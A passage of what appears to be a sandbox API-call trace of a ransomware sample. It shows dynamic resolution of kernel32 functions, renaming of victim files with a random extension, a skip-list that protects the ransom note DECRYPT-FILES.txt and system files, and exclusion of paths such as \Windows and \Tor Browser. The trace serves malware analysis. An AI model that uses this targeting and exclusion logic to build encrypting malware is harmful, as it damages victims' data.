lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.900] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.900] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.900] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.900] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.900] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.900] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.900] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.900] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.900] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.900] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.900] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.900] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.900] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.900] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.901] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.901] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.901] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.901] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.901] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.901] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.901] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.901] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.901] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.901] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.901] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.901] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.901] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.901] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.901] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.901] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.901] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.901] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.901] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.901] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.902] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.902] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.902] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.902] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.902] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.902] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.902] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.902] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.902] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.902] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.902] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.902] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.902] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.902] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.902] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.902] lstrlenA (lpString="DELETEATOM") returned 10 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.902] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.902] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.902] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.903] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.903] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.903] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.903] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.903] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.903] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.903] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.903] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.903] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.903] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.903] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.903] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.903] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.903] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.903] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.904] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.904] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.904] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.904] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.904] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.904] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.904] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.904] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.904] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.904] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.904] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.904] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.904] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.904] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.904] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.904] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.904] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.904] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.904] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.905] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.905] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.905] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.905] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.905] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.905] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.905] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.905] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.905] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.905] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.905] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.905] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.905] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.905] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 96 [0077.906] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.x7Pf") returned 101 [0077.906] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.x7Pf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat.x7pf"), dwFlags=0x0) returned 1 [0077.906] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.906] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.907] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.907] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.907] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.907] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.907] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.907] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.907] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.907] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned 87 [0077.907] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.907] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0077.907] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\jkbimi8.tmp" [0077.907] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.908] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.908] CloseHandle (hObject=0x0) returned 0 [0077.908] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.908] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b9d5d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b9d5d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VRLZOZ0E", cAlternateFileName="")) returned 1 [0077.908] lstrcmpW (lpString1="VRLZOZ0E", lpString2=".") returned 1 [0077.908] lstrcmpW (lpString1="VRLZOZ0E", lpString2="..") returned 1 [0077.908] lstrcatW (in: lpString1="VRLZOZ0E", lpString2="\\" | out: lpString1="VRLZOZ0E\\") returned="VRLZOZ0E\\" [0077.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="VRLZOZ0E\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\" [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Program Files") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch=":\\Windows") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Games\\") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.908] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.908] StrStrW 